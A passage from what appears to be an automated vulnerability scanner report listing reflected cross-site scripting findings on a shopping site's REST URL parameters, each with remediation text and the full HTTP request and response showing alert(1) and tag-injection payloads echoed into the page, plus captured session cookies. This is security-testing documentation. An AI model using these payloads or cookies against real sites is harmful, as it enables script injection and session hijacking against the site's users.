The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b86'-alert(1)-'e4ce2f33919 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Accessoriesc0b86'-alert(1)-'e4ce2f33919/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:22:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessoriesc0b86'-alert(1)-'e4ce2f33919/37';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.780. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cea8'-alert(1)-'9184fa4d8d2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories/375cea8'-alert(1)-'9184fa4d8d2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:28:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessories/375cea8'-alert(1)-'9184fa4d8d2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.781. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab316'-alert(1)-'6f23b0306e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppingab316'-alert(1)-'6f23b0306e4/Clothing-Accessories/194367784/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:52:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shoppingab316'-alert(1)-'6f23b0306e4/Clothing-Accessories/194367784/Bags/40';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.782. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48186"><a>512069709a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping48186"><a>512069709a5/Clothing-Accessories/194367784/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:41:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping48186"><a>512069709a5">
...[SNIP]...

4.783. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1610'-alert(1)-'45c620a5884 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessoriese1610'-alert(1)-'45c620a5884/194367784/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:57:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessoriese1610'-alert(1)-'45c620a5884/194367784/Bags/40';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.784. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87b97<script>alert(1)</script>1c06cca41de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories87b97<script>alert(1)</script>1c06cca41de/194367784/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:58:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories87b97<script>alert(1)</script>1c06cca41de <a href="#" id="backlink">
...[SNIP]...

4.785. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8437'-alert(1)-'62563474686 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784c8437'-alert(1)-'62563474686/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:02:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784c8437'-alert(1)-'62563474686/Bags/40';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.786. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e198'-alert(1)-'7ee46bc00d5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Bags4e198'-alert(1)-'7ee46bc00d5/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:09:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784/Bags4e198'-alert(1)-'7ee46bc00d5/40';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.787. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82004'-alert(1)-'e4743644b8c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Bags/4082004'-alert(1)-'e4743644b8c HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:13:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Bags/4082004'-alert(1)-'e4743644b8c';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.788. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4c74"><a>4cce4fff839 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingd4c74"><a>4cce4fff839/Clothing-Accessories/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:08:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingd4c74"><a>4cce4fff839">
...[SNIP]...

4.789. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bead2'-alert(1)-'dab9ae7e52d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppingbead2'-alert(1)-'dab9ae7e52d/Clothing-Accessories/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:19:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shoppingbead2'-alert(1)-'dab9ae7e52d/Clothing-Accessories/194367784/Clothing/8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.790. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe482<script>alert(1)</script>05c915e75c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessoriesfe482<script>alert(1)</script>05c915e75c3/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:32:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessoriesfe482<script>alert(1)</script>05c915e75c3 <a href="#" id="backlink">
...[SNIP]...

4.791. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3d8'-alert(1)-'93e2feb3b08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories5b3d8'-alert(1)-'93e2feb3b08/194367784/Clothing/8 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:30:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories5b3d8'-alert(1)-'93e2feb3b08/194367784/Clothing/8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.792. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

